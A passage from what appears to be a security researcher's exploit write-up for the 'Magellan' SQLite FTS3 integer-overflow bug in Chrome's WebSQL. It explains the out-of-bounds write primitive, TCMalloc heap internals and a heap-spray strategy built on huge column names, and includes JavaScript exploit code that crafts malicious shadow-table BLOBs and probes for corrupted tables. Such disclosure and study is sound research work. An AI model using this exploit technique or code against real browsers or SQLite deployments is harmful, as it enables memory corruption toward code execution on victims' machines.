This is what gets saved into the root column of tablename_segdir when the user INSERTs “apple april applepie” into the fts table. As more content is inserted, the tree grows interior nodes and more leaves, and the BLOB data of the entire tree is stored in the tablename_segdir and tablename_segments shadow tables. This may not be entirely accurate, but it is basically what the indexing engine does, and how the engine stores all the search keywords and looks them up in a fast and efficient way. It should be noted that all the Length values within this leaf node are stored in the fts VarInt (Variable Length Integer) format described above.
Revisiting the Bug
Now that the foundation has been laid out, it is time to revisit the bug to get a better understanding of it and of the (initial) primitives it provides us. But before we dig into the bug itself, let’s discuss something about shadow tables, and how SQLite treated them before they were hardened in version 3.26.0.
As mentioned above, shadow tables are (were) essentially just normal tables, with no access control mechanism protecting them. As such, anyone who can execute arbitrary SQLite statements can read and modify shadow tables without any restrictions. This becomes an issue when the virtual table implementation C code reads content from the shadow tables and parses it. This is exactly what the bug relies on: it requires a value in one of the shadow tables to be set to a specific value in order to trigger.
After the Magellan bug was reported to SQLite, the SQLite developers deemed the ability to modify shadow tables too powerful, and in response decided to add a mitigation: the SQLITE_DBCONFIG_DEFENSIVE flag added in version 3.26.0. The actual bugs were fixed in 3.25.3, but the advisory recommends upgrading to 3.26.0 in case any other bug is lurking in the code, so that exploitation of such a bug can be blocked with the flag. Turning on this flag makes the shadow tables read-only to user-executed SQL queries, making it impossible for malicious SQL queries to modify data within the shadow tables. (This is not entirely true, because there are lots of places where SQL queries are dynamically created by the engine code itself, such as this function. SQL queries executed by the SQLite engine itself are immune to the SQLITE_DBCONFIG_DEFENSIVE flag, so some of these dynamic queries, which are constructed based on values supplied by the attacker’s SQL query, are potential bypass targets. These attacker-controlled values can include spaces and special characters without any issues when the entire value is surrounded by quotes, which makes them a possible SQL injection attack vector. Still, the SQLITE_DBCONFIG_DEFENSIVE flag serves as a good front line defense.)
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                  /* Return code of various sub-routines */
  char *pNext;             /* Cursor variable */
  int nPrefix;             /* Number of bytes in term prefix */
  int nSuffix;             /* Number of bytes in term suffix */
To understand the code, the meaning of some variables should be explained. The fts3SegReaderNext function reads data from the fts3 B-Tree nodes, traverses each Term stored in a single node, and builds a full term based on the Term 1 string and the Prefix and Suffix data of the rest of the Terms. pReader holds the information of the current Term being built. The pNext variable points into the BLOB data of the tablename_segdir->root column; we will assume that the BLOB contains data representing a leaf node with exactly 2 Terms. pNext continuously advances as data is read in by the program code. The function fts3GetVarint32 reads an fts VarInt from the data pNext points to and stores it into a 32-bit variable. pReader->zTerm contains malloc’d space that is big enough to hold the term built on each iteration.
Now let’s assume that the tablename_segdir->root contains BLOB data such as follows.
The range of Term 1 was expanded to include the leftmost byte, which is a fixed value of 0 but internally represents the Prefix Length of Term 1. In this layout, fts3SegReaderNext would be called 2 times. In the first call, it would allocate a 0x10 sized space for the string apple on line 23 of the previous code listing, and actually copy in the value on line 34. On the second call, it would add the length of the prefix and suffix, and check if it exceeds 5*2 on line 21. Since it doesn’t, it reuses the space created on the first call, and builds a complete term by copying in the prefix and the suffix on line 34. This is done for all terms stored within the current node, but in the above case, it is only called twice. Now consider the following case.
Everything is the same with Term 1: a 0x10 space is allocated and apple is stored. However, on the second iteration, nPrefix is read from the blob as 0x7FFFFFFF, and nSuffix as 1. On line 21, nPrefix + nSuffix is 0x80000000, which is negative as a signed 32-bit value, thus bypassing the check (which operates on signed integers), and no allocation is performed. On line 34, the memcpy will operate with the destination being &pReader->zTerm[0x7FFFFFFF]. As a note, the reason the example value of nPrefix is set to 0x7FFFFFFF instead of 0xFFFFFFFF is that the function that actually reads the value, fts3GetVarint32, only reads up to a maximum value of 0x7FFFFFFF; any value above that is truncated.
Let’s first assess the meaning of this on a 32-bit platform. pReader->zTerm points to the beginning of apple, so &pReader->zTerm[0x7FFFFFFF] will point 2 gigabytes after apple, and memcpy will copy 1 byte of the suffix, “a”, to that location. This is effectively an OOB write to data placed 2GB after Term 1’s string. On a 32-bit platform, there is a possibility that &pReader->zTerm[0x7FFFFFFF] actually wraps around the address space and points to an address before apple. This could be used to our advantage, if it is possible to place interesting objects at the wrapped-around address.
Now let’s see which elements of the OOB write are controllable. Since the attacker can freely modify the shadow table data, the entire content of the BLOB is controllable. This means that the string of Term 1 is controllable, and in turn, the allocation size of pReader->zTerm is controllable. The offset 0x7FFFFFFF of &pReader->zTerm[0x7FFFFFFF] is also controllable, provided it is no higher than 0x7FFFFFFF. Next, since the Suffix Length of Term 2 is attacker controlled, the memcpy size is also controlled. Finally, the actual data copied from the source of the memcpy comes from pNext, which points to Term 2’s string data, so that is controlled too. This gives a restrictive but powerful OOB write primitive, where the destination chunk size, memcpy source data content, and size are completely attacker controlled. The only requirement is that the target to be corrupted has to be placed 2GB after the destination chunk, which is apple in the example.
The situation in a 64-bit environment is not very different from 32-bit. Everything is the same, except that &pReader->zTerm[0x7FFFFFFF] has no chance to wrap around the address space, because the 64-bit address space is too big for that to happen. Also, while in 32-bit spraying the heap to cover the entire address space is a useful technique that can aid exploitation, it is not feasible in 64-bit.
Now let’s talk about the restriction of the bug. Because the sum nPrefix + nSuffix has to be at least 0x80000000 in order to bypass the check on line 21, only certain nPrefix and nSuffix value pairs can be used to trigger the bug. For instance, a [0x7FFFFFFF, 1] pair is okay. [0x7FFFFFFE, 2], [0x7FFFFFFD, 3], [1, 0x7FFFFFFF] and [2, 0x7FFFFFFE] are also okay. But [0x7FFFFFF0, 1] is not okay: it will pass the check and fall into the if block, where a very large allocation happens and the function most likely returns with SQLITE_NOMEM. Therefore, based on the values accepted by the bug, we can OOB write data in the following ranges.
Basically, the overwritten data must include the byte that is exactly 0x7FFFFFFF bytes away from the memcpy destination, and it could overwrite data either backwards or forward, with attacker controlled data of any size. This is the positional restriction of the bug. The OOB write cannot start at an arbitrary offset. After assessing the primitives given by the bug, we came to the conclusion that the bug could very well be exploitable on 64-bit platforms, provided that there is a good target for corruption, where the target object has certain tolerance for marginal errors. The next sections will describe the entire process of exploitation, including which targets were picked for corruption, and how they were abused for information leak and code execution.
Exploitation
Before diving in, it should be noted that the exploit was not designed to be 100% reliable. There are some sources of failure and some of them were addressed, but the ones that were too time consuming to fix were just left as is. The exploit was built as means to show that the bug is exploitable on Desktop platforms, and as such, the focus was placed on pushing through to achieve code execution, not maximizing reliability and speed. Nevertheless, we will discuss potential pitfalls and sources of failure on each stage of exploitation, and suggest possible solutions to address them.
The exploit is divided into 11 stages. The division is necessary because all the SQL queries cannot be stuffed into one huge transaction: certain queries had to be split in order to achieve reliable corruption. Furthermore, a lot of SQL queries depend on the results of previous queries, such as in the infoleak phase, so the previous query results had to be parsed from javascript and passed on to the next batch of SQL queries. Each of the 11 stages will be described in detail, from the meaning of the cryptic queries to the actual goal each stage tries to achieve.
The TCMalloc allocator
Before even attempting to build an exploit, it is essential to understand the allocator in play. An application linking the sqlite library would most likely use the underlying system allocator, but in the case of Chrome, things are a little different. According to the heap design documents of Chrome, Chrome hooks malloc and all related calls and redirects them to other custom allocators. This differs per operating system, so it is important to understand which allocator Chrome uses instead of the system one. On Linux, Chrome redirects every malloc operation to TCMalloc. TCMalloc is an allocator developed and maintained by Google, designed with certain security properties in mind as well as being fast and efficient.
TCMalloc works much like allocators such as jemalloc or the LFH: it splits a couple of pages into equal-sized chunks and groups chunks of each size into separate freelists. The chunks are linked somewhat like PTMalloc’s fastbins, in a singly-linked list, and the way a page is split into equal-sized chunks resembles jemalloc. However, unlike the LFH, there is no randomness added to the freelists, which makes the job easier. TCMalloc has 2 (more specifically, 3) size categories. In Chrome, chunks smaller than 0x8000 bytes are categorized as small chunks, while bigger ones are large chunks. The small chunks are further divided into 54 size classes (this value is specific to Chrome), and chunks are grouped and managed by their respective size class, with the free chunks linked in singly-linked lists as described above. TCMalloc maintains per-thread caches and a central page cache. Each thread has its own freelists to manage its pool of small chunks. If the freelist of a certain chunk size reaches a certain threshold (which is dynamic and adapts to heap usage), the per-thread cache can toss chunks of that size class’s freelist to the central cache. Alternatively, if the combined size of all free chunks across all size classes of the thread cache reaches a threshold (4MB on Chrome), the garbage collector kicks in, collects chunks from all freelists of the thread cache, and gives them to the central cache. The central cache is the manager for all thread caches: it issues new freelists if a thread cache’s freelist is exhausted, and collects chunks if a thread cache’s freelist grows too big. The central cache is also the manager for large chunks.
Chunks larger than 0x8000 bytes are requested directly from the central cache, which manages the freelists of large chunks either as a singly-linked list or a red-black tree.
All of this might seem too convoluted on text. Here are some illustrations borrowed from Sean Heelan’s excellent slides from 2011 InfiltrateCon.
An overview of the Thread Cache and the Central Page Cache
How the Central Cache conjures a new freelist
Singly-linked list of each size class of small chunks
The algorithm of tc_malloc(small_chunk_size)
Also, the following links are very helpful to get a general overview of how the TCMalloc allocator works.
And of course, the best reference is the source code itself.
Stage 1 and Stage 2
Now that the basics of the allocator have been touched upon, it’s time to find the right object to corrupt. One of the first targets that comes to mind is JavaScript objects on the v8 heap. This was the first target we went for, because corrupting the right JavaScript object would instantly yield a relative R/W, which can further be upgraded to an AAR/AAW. However, due to the way PartitionAlloc requests pages from the underlying system allocator, it turned out to be practically impossible to have the v8 heap placed behind TCMalloc’s heap; even in the best case, the chances were near zero.
Therefore, we decided to go for objects that are bound to be on the same heap, that is, objects allocated by SQLite itself. As mentioned in the SQLite Architecture section, the actual data values of the tables are not good targets for manipulating the heap. The B-Tree that represents the data also lives in the Page Cache or the database file on disk. Even if parts of the B-Tree are briefly constructed in memory upon a SELECT statement, they are immediately purged as soon as the Bytecode engine is done executing the SELECT statement. There would seem to be a very limited choice of objects that could influence the heap in a controlled fashion if the table data values cannot be used. However, there is one more object that makes a good candidate.
That is, Table and Column objects. It just so happens that SQLite keeps all Table and Column objects created by a CREATE statement in memory, and those objects persist until the database is closed completely. The decision behind this is presumably based on the assumption that Table and Column objects would not be too bloated, or at least that such cases would be rare enough that the performance advantage of keeping those objects in memory would outweigh their memory cost. This is true to some degree. In practice, however, it is possible to construct Column objects that eat a colossal amount of memory while persisting in memory. This can be observed on the Limits In SQLite webpage.
The maximum number of bytes in the text of an SQL statement is limited to SQLITE_MAX_SQL_LENGTH which defaults to 1000000. You can redefine this limit to be as large as the smaller of SQLITE_MAX_LENGTH and 1073741824.
One thing to notice is that SQLite has no explicit limit on the length of a column name or a table name. Both are governed only by the length of the SQL statement that contains them, which is capped at SQLITE_MAX_SQL_LENGTH. So as long as the user query stays below SQLITE_MAX_SQL_LENGTH, SQLite will happily accept column names of any size. Although SQLite itself defaults SQLITE_MAX_SQL_LENGTH to 1000000, Chrome redefines this value as 1000000000.
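A quick sanity check of the limit described above. This is an illustrative sketch, not exploit code: the 16MB name used here is scaled up to 256MB later in the actual exploit, which still fits comfortably under Chrome’s 1000000000-byte statement limit.

```javascript
const SQLITE_MAX_SQL_LENGTH = 1000000000; // Chrome's redefined limit
const columnName = 'A'.repeat(0x1000000); // a 16MB column name (exploit uses up to 256MB)
const statement = `CREATE TABLE spray0(${columnName})`;
// The whole CREATE TABLE statement is still far below the limit,
// so SQLite will accept (and keep in memory) this enormous column name.
console.log(statement.length < SQLITE_MAX_SQL_LENGTH); // true
```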
/*
** The maximum length of a single SQL statement in bytes.
**
** It used to be the case that setting this value to zero would
** turn the limit off. That is no longer true. It is not possible
** to turn this limit off.
*/
#ifndef SQLITE_MAX_SQL_LENGTH
# define SQLITE_MAX_SQL_LENGTH 1000000000
#endif
1000000000 is a very big value, almost 1GB. What this means is that it is theoretically possible to create column names that are approximately 1GB in size and make them persist in memory. Before discussing what we are going to do with the Column values, let’s look at the structures of the objects involved in column name creation, and the code that handles them.
When a table is created by a CREATE statement, the tokenizer tokenizes the entire SQL query and passes the tokens to the parser. Under the hood, SQLite uses the Lemon Parser Generator. Lemon is similar to the more popular YACC and Bison parser generators, but uses a different grammar syntax and is maintained by SQLite. Lemon takes a context-free grammar written in its own syntax and generates an LALR parser in C. In SQLite, the bulk of the generated C code can be found in the yy_reduce function. The grammar itself lives in parse.y, and the rules used for CREATE statements are found here. A snippet of the code is shown below.
The bulk of the Table creation logic is performed in the sqlite3StartTable function, and the Column handling logic is found in sqlite3AddColumn. Let’s visit the sqlite3StartTable function and take a brief look.
void sqlite3StartTable(
  Parse *pParse,   /* Parser context */
  Token *pName1,   /* First part of the name of the table or view */
  Token *pName2,   /* Second part of the name of the table or view */
  int isTemp,      /* True if this is a TEMP table */
  int isView,      /* True if this is a VIEW */
  int isVirtual,   /* True if this is a VIRTUAL table */
  int noErr        /* Do nothing if table already exists */
){
  Table *pTable;
  char *zName = 0; /* The name of the new table */
  sqlite3 *db = pParse->db;
  Vdbe *v;
  int iDb;         /* Database number to create the table in */
  Token *pName;    /* Unqualified name of the table to create */
The most important object for our purposes is the Table object. This structure contains all the information about the table created by the CREATE statement, and its definition is as follows.
struct Table {
  char *zName;         /* Name of the table or view */
  Column *aCol;        /* Information about each column */
  Index *pIndex;       /* List of SQL indexes on this table. */
  Select *pSelect;     /* NULL for tables.  Points to definition if a view. */
  FKey *pFKey;         /* Linked list of all foreign keys in this table */
  char *zColAff;       /* String defining the affinity of each column */
  ExprList *pCheck;    /* All CHECK constraints */
                       /* ... also used as column name list in a VIEW */
  int tnum;            /* Root BTree page for this table */
  u32 nTabRef;         /* Number of pointers to this Table */
  u32 tabFlags;        /* Mask of TF_* values */
  i16 iPKey;           /* If not negative, use aCol[iPKey] as the rowid */
  i16 nCol;            /* Number of columns in this table */
  LogEst nRowLogEst;   /* Estimated rows in table - from sqlite_stat1 table */
  LogEst szTabRow;     /* Estimated size of each table row in bytes */
  u8 keyConf;          /* What to do in case of uniqueness conflict on iPKey */
  int addColOffset;    /* Offset in CREATE TABLE stmt to add a new column */
  int nModuleArg;      /* Number of arguments to the module */
  char **azModuleArg;  /* 0: module 1: schema 2: vtab name 3...: args */
  VTable *pVTable;     /* List of VTable objects. */
  Trigger *pTrigger;   /* List of triggers stored in pSchema */
  Schema *pSchema;     /* Schema that contains this table */
  Table *pNextZombie;  /* Next on the Parse.pZombieTab list */
};
For our purposes, the most important fields are aCol and nCol. Next, we will look at the sqlite3AddColumn function.
  if( pType->n==0 ){
    /* If there is no type specified, columns have the default affinity
    ** 'BLOB' with a default size of 4 bytes. */
    pCol->affinity = SQLITE_AFF_BLOB;
    pCol->szEst = 1;
#ifdef SQLITE_ENABLE_SORTER_REFERENCES
    if( 4>=sqlite3GlobalConfig.szSorterRef ){
      pCol->colFlags |= COLFLAG_SORTERREF;
    }
#endif
  }else{
    zType = z + sqlite3Strlen30(z) + 1;
    memcpy(zType, pType->z, pType->n);
    zType[pType->n] = 0;
    sqlite3Dequote(zType);
    pCol->affinity = sqlite3AffinityType(zType, pCol);
    pCol->colFlags |= COLFLAG_HASTYPE;
  }
  p->nCol++;
  pParse->constraintName.n = 0;
}
The important parts of the logic are highlighted. Several things can be observed from this function. First, as mentioned above, there is no limit on the length of a column name. However, there is a limit on how many columns a single table can have, defined by db->aLimit[SQLITE_LIMIT_COLUMN]. The value comes from a #define in the SQLite source code and is set to 2000.
/*
** This is the maximum number of
**
** * Columns in a table
** * Columns in an index
** * Columns in a view
** * Terms in the SET clause of an UPDATE statement
** * Terms in the result set of a SELECT statement
** * Terms in the GROUP BY or ORDER BY clauses of a SELECT statement.
** * Terms in the VALUES clause of an INSERT statement
**
** The hard upper limit here is 32676. Most database people will
** tell you that in a well-normalized database, you usually should
** not have more than a dozen or so columns in any table. And if
** that is the case, there is no point in having more than a few
** dozen values in any of the other situations described above.
*/
#ifndef SQLITE_MAX_COLUMN
# define SQLITE_MAX_COLUMN 2000
#endif
This is something to keep in mind for later.
Also, column names within a table cannot be duplicated. Next, the column properties are stored in an array of Column objects, pointed to by tableObject->aCol. This array grows by eight entries at a time, which can be seen in line 26. The function also sets various flags on the Column object. The definition of the Column structure is as follows.
/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/
struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence.  If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties.  See COLFLAG_ defines below */
};
The actual column name will be held in zName, and there are various other fields that describe the characteristics of a column.
One last thing that should be mentioned is that these functions are called in the parser phase of the SQLite execution pipeline. This means that the only heap noise present is the noise from the tokenizer phase. However, the tokenizer creates almost zero heap noise, so the objects created on the heap, as well as the heap activity that occurs during a CREATE TABLE statement, are quite manageable.
The following is how an actual Table object and the accompanying Column array would look in memory.
The important thing to notice about these Table objects is that they are consulted for every operation on the table, be it a SELECT, UPDATE, or INSERT statement. Every field in a user query that references something in a table is checked against the Table object residing in memory. From an exploitation standpoint, this means that if we can corrupt certain fields in these objects, we can make SQLite react in peculiar ways to certain SQL queries. Take the column name above as an example. Suppose we corrupt the name t1 and change it to t1337. If the attacker then executes the statement “SELECT t1 FROM test”, SQLite responds that no such column as t1 exists: while executing the SELECT, the engine consults the Table object, walks the aCol array, and sequentially checks whether a column named t1 exists. If it finds no such column, it returns an error.
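The lookup behavior just described can be modeled with a toy sketch (this is illustrative JavaScript, not SQLite code): resolving a column walks Table.aCol sequentially and compares names, so a corrupted name turns the original query into a “no such column” error, which is exactly the oracle the exploit relies on.

```javascript
// Toy model of SQLite's sequential column-name resolution.
function resolveColumn(table, name){
  for(let i = 0; i < table.nCol; i++){
    if(table.aCol[i].zName === name) return i; // found: column index
  }
  return -1; // SQLite reports: no such column
}

// Simulate a Table whose column name t1 was corrupted into t1337.
const corruptedTable = { nCol: 2, aCol: [{zName: 't1337'}, {zName: 'other'}] };
console.log(resolveColumn(corruptedTable, 't1'));    // -1: the corruption oracle fires
console.log(resolveColumn(corruptedTable, 't1337')); // 0
```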
Knowing this, and the other elements discussed above, a plan of attack emerges.
Spray a whole bunch of Column arrays, enough to fill more than 2GB of memory.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the vulnerability, and corrupt one of the column object’s zName field.
Corrupt the field so that it points to an address that we want to leak.
Afterwards, try to leak the value through SQL statements.
There are several caveats with this approach. The problems are not immediately clear until actually constructing the payload and viewing the results, so we will address them as they appear, one by one.
The first problem is that the maximum number of columns in SQLite is 2000. A single Column object’s size is 0x20, so the maximum size of a Column array is 0xFA00. In order to spray 2GB worth of memory, roughly 0x8000 tables with 2000 columns each have to be sprayed. 0x8000 doesn’t seem like a big number for SQLite to handle, but when actually spraying that many column arrays, the whole process takes about 10 minutes. That is a lot of time, and we wanted to reduce it to something more manageable.
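The arithmetic behind this naive plan, using the numbers from the text (0x20-byte Column objects, a SQLITE_MAX_COLUMN of 2000), can be checked directly:

```javascript
const COLUMN_OBJECT_SIZE = 0x20;  // sizeof(Column) on 64-bit
const SQLITE_MAX_COLUMN = 2000;   // per-table column limit
const maxColumnArrayBytes = COLUMN_OBJECT_SIZE * SQLITE_MAX_COLUMN;
console.log(maxColumnArrayBytes.toString(16)); // fa00

const sprayTarget = 2 * 1024 * 1024 * 1024;    // 2GB
const tablesNeeded = Math.ceil(sprayTarget / maxColumnArrayBytes);
console.log(tablesNeeded.toString(16));        // 8313, i.e. roughly the 0x8000 quoted above
```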
To address this problem, we used a divide-and-conquer approach. How it works is as follows.
Create 8 tables, each with a single 256MB-long column name. This will spray 2GB worth of data.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
A picture is worth a thousand words. The entire process is illustrated below.
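The spray and probe steps above can be sketched in code as follows. The helper names are hypothetical (the real exploit feeds such statements through WebSQL transactions), and the tiny nameLen here stands in for the ~0x10000000 (256MB) names the exploit actually uses:

```javascript
// Step 1: spray 8 tables whose single column name fills one large region each.
function buildSprayStatements(count, nameLen){
  const statements = [];
  for(let i = 0; i < count; i++){
    statements.push(`CREATE TABLE test${i}(${'A'.repeat(nameLen)}_0)`);
  }
  return statements;
}

// Step 4: probe every table for its own column name. The one table that
// errors with "no such column" is the one the OOB write hit.
function buildProbeStatements(count, nameLen){
  const statements = [];
  for(let i = 0; i < count; i++){
    statements.push(`SELECT ${'A'.repeat(nameLen)}_0 FROM test${i}`);
  }
  return statements;
}

const sprays = buildSprayStatements(8, 16);
const probes = buildProbeStatements(8, 16);
```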
When testing this for the first time in Chrome, we realized that it actually works, so we decided to build all kinds of different primitives based on this concept.
Another problem became immediately clear when running this first experiment several times: the random location of apple. After the first successful corruption, on the next attempt the allocation of apple would jump to a completely different place. This was highly undesirable. In order to place an object of interest at the OOB write address, the OOB write location needed to stay fixed instead of jumping around, which made it impossible to build further primitives on top of it. The reason apple kept moving was that it was allocated from the 0x10 size-class freelist of the thread cache; heap noise placing lots of 0x10 chunks on that freelist was very likely the source of the uncertainty. To understand the actual source of the noise, let’s look at the stack trace at the moment the bug triggers.
Breakpoint 2, fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
168731      if( !pReader->aDoclist ){
(gdb) bt
#0  fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
#1  0x00000000004e414a in fts3SegReaderStart (p=0x74b378, pCsr=0x74dbf8, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170143
#2  0x00000000004e427a in sqlite3Fts3MsrIncrStart (p=0x74b378, pCsr=0x74dbf8, iCol=1, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170183
#3  0x00000000004d7699 in fts3EvalPhraseStart (pCsr=0x753fe8, bOptOk=1, p=0x7510a8) at sqlite3.c:161648
#4  0x00000000004d8356 in fts3EvalStartReaders (pCsr=0x753fe8, pExpr=0x751068, pRc=0x7fffffffbe68) at sqlite3.c:162034
#5  0x00000000004d8c62 in fts3EvalStart (pCsr=0x753fe8) at sqlite3.c:162362
#6  0x00000000004d5ed1 in fts3FilterMethod (pCursor=0x753fe8, idxNum=3, idxStr=0x0, nVal=1, apVal=0x745540) at sqlite3.c:160604
#7  0x0000000000465aca in sqlite3VdbeExec (p=0x73f428) at sqlite3.c:89599
#8  0x000000000045a1cb in sqlite3Step (p=0x73f428) at sqlite3.c:81040
In frame #6 of the backtrace, it can be observed that the virtual table method fts3FilterMethod is executed from the Virtual Database Engine. This means the SELECT statement was tokenized, parsed, compiled to bytecode, and the bytecode executed. It is easy to imagine how many unwanted heap allocations occur throughout that entire pipeline.
Generally, there are 2 ways to deal with heap noise.
Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap noise.
Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that size-class.
Method 1 is definitely possible, and has been successful in some past engagements. However, whenever method 2 is applicable, it is the preferable one and the one we always choose. To address the heap noise, we went with method 2, because the size of the apple allocation is completely attacker controlled.
Now it is time to refine the strategy.
The size of apple should be upgraded to something bigger than 0x800. Let’s say, 0xa00.
0xa00 sized chunks will be sprayed. One of the 0xa00 chunks will be a placeholder to be used with the apple fts3 allocation.
Create 8 tables, each with a single 256MB-long column name. This will spray 2GB worth of data.
Create a hole in the placeholder from step 2. This will place it on top of the 0xa00 freelist.
Allocate the 0xa00 sized apple fts3 allocation in the placeholder. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Plug in the placeholder hole with a new 0xa00 allocation, so it could be reused for corruption in a later phase.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
The entire process is illustrated below.
This strategy makes it possible to corrupt the same address over and over again with different content on each attempt. For the OOB write to be useful in the later stages of exploitation, it has to work repeatedly and reliably, no matter how many times it is executed. While experimenting with this strategy, we realized that the OOB write was not reliable when the bug-triggering SQL statements were coupled with other SQL statements, such as the heap spray statements. However, when the bug-triggering statements were detached into a single transaction and executed separately from any other statements, it worked reliably. Even when the primitive was executed 0x1000 times, not a single attempt had apple stray away from the placeholder; every attempt succeeded with the OOB write landing at the same address.
One thing to note is how the heap manipulation primitives are constructed. To spray the heap with a chunk of controlled size and content, a table is created with a single column, and the column name becomes the sprayed content. To create holes, the table is dropped, which deallocates the attached column name from the heap. This makes a perfect primitive for creating and freeing chunks in a completely controlled manner.
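The two primitives just described can be sketched as small statement builders (hypothetical helper and table names; the real exploit batches these statements into WebSQL transactions):

```javascript
// Spray: the column name becomes a heap chunk of chosen size and content.
function sprayChunk(statements, tableName, columnName){
  statements.push(`CREATE TABLE ${tableName}(${columnName})`);
}

// Hole: dropping the table frees the column name chunk again.
function punchHole(statements, tableName){
  statements.push(`DROP TABLE ${tableName}`);
}

const statements = [];
sprayChunk(statements, 'ph', 'B'.repeat(0x9f0)); // aimed at the 0xa00 size class
punchHole(statements, 'ph');                     // hole goes on top of the 0xa00 freelist
```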
Another thing worth mentioning is the discrepancy in where the chunk operations happen. For instance, the hole-creating primitive frees the column name during the parser phase, while the fts table’s term apple is allocated during the execution of the Bytecode Engine. A lot of noise occurs between the moment the chunk is freed and the moment apple refills it. To minimize that noise, we upgraded the apple chunk to the 0xa00 size class. Also, as luck would have it, the hole created during DROP TABLE remains on top of the freelist all the way until apple comes along to pick it back up. This is not always the case, as will be seen in the later stages of exploitation, but DROP TABLE and the apple allocation make a perfect free/refill pair.
The entire strategy described above would look something like this in JavaScript.
function create_oob_string(chunk_size, memcpy_offset, payload){
  let target_chunk;
  let chunk_size_adjusted;
  if(chunk_size < 0x1000)
    chunk_size_adjusted = chunk_size - 0x10;
  else
    chunk_size_adjusted = chunk_size - 0x100;
  chunk_size_adjusted /= 2;  // To account for the *2 on realloc
  target_chunk = 'A'.hexEncode().repeat(chunk_size_adjusted);
  let payload_hex = payload.hexEncode();
  let oob_string = `X'00${create_var_int(chunk_size_adjusted)}${target_chunk}03010200${create_var_int(memcpy_offset)}${create_var_int(payload.length)}${payload_hex}03010200'`;
  return oob_string;
}
function create_var_int(number){
  let varint = '';
  let current_number = number;
  while(current_number != 0){
    let shifted_number = current_number >> 7;
    // reconstructed from here: FTS3-style varint, 7 bits per byte,
    // high bit set on every byte except the last
    let mask = (shifted_number != 0) ? 0x80 : 0;
    varint += ((current_number & 0x7F) | mask).toString(16).padStart(2, '0');
    current_number = shifted_number;
  }
  return varint;
}
statements.push("CREATE TABLE debug_table(AAA)");
statements.push("CREATE VIRTUAL TABLE ft USING fts3");
statements.push("INSERT INTO ft VALUES('dummy')");
function sploit2(){
  let statements = [];
  let found_flag = 0;
  let oob_string = create_oob_string(oob_chunk_size, 0x7FFFFFFF, "ZZZZ");
  console.log('Stage2 Start!');
  statements.push(`UPDATE ft_segdir SET root = ${oob_string}`);
  statements.push(`DROP TABLE test${saved_index}`);
  statements.push(`SELECT * FROM ft WHERE ft MATCH 'test'`);
  saved_index = spray(statements, oob_chunk_size, 1, "A");
function ping_column(current_index){
  let statement = `SELECT ${"A".repeat(0x10000000 - 0x100)}_0 FROM test${current_index}`;
  db.transaction((tx) => {
    tx.executeSql(
      statement, [],
      function(sqlTransaction, sqlResultSet){
        console.log('success!!!');
        console.log(`test index : ${current_index}`);
        if(current_index == big_boy_spray_count - 1){
          found_flag = -1;
        }
      },
      function(sqlTransaction, sqlError){
        console.log('fail!!!');
        console.log(`test index : ${current_index}`);
        found_flag = 1;
      }
    );
  },
  dbErr,
  function(){
    if(found_flag == 0){
      ping_column(current_index + 1);
    } else if(found_flag == 1){
      let corrupted_index = current_index;
      console.log(`corrupted index : ${corrupted_index}`);
      sploit3_1(corrupted_index);
    } else {
      console.log(`Stage1 : The column name didn't get corrupted. Something's wrong...?`);
    }
  });
}
In the previous stage, it was mentioned that a divide-and-conquer approach was used. The first stage sprays gigantic 256MB heap chunks, 0x10000000 bytes in size. The next stage scales this down by a factor of 0x10 and does the same thing with 16MB (0x1000000) chunks. The following illustration describes the entire process.
It’s easy to see where this is going. Stage 4 does the same thing with 0x100000 sized chunks, stage 5 with 0x10000, and stage 6 with 0x1000. All of this scales the target chunks down until they reach a size of 0x1000. The reason is that column object arrays can only grow up to 0xFA00 in size, as mentioned above. Also, the column array is realloc’d for every 8 new columns, making it jump all around the heap, so to keep the problem simpler, 0x1000 was chosen instead of 0x10000. 0x1000 is a big enough size to be free of most of the heap noise.
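The stage 2 through stage 6 scale-down schedule can be written out explicitly: each stage re-runs the same corrupt-and-probe routine on chunks 16x smaller than the previous stage, until the 0x1000 target size is reached.

```javascript
// Enumerate the chunk sizes used by stages 2 through 6.
const stageSizes = [];
for(let size = 0x10000000; size >= 0x1000; size >>= 4){
  stageSizes.push(size);
}
console.log(stageSizes.map(s => '0x' + s.toString(16)));
// [ '0x10000000', '0x1000000', '0x100000', '0x10000', '0x1000' ]
```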
Before proceeding to the next stage, it is worth discussing sources of failure in this part of the exploit. First, all chunks bigger than 0x8000 come from the Central Cache. This means there is a chance that other threads snatch pages from the Central Cache before the WebSQL database thread has a chance to grab them. Fortunately, this doesn’t happen very often. If it does become a problem, there is a way around it: first track down the problematic allocation and figure out its size class, then deliberately allocate and free a chunk matching that size, in a way that it doesn’t get coalesced with adjacent chunks. This places the freed chunk on the Central Cache’s freelist, so when the rogue allocation takes place, the thread that requested it will take that chunk from the freelist, leaving the other chunks alone. This problem actually applies to all stages, but it occurs very rarely.
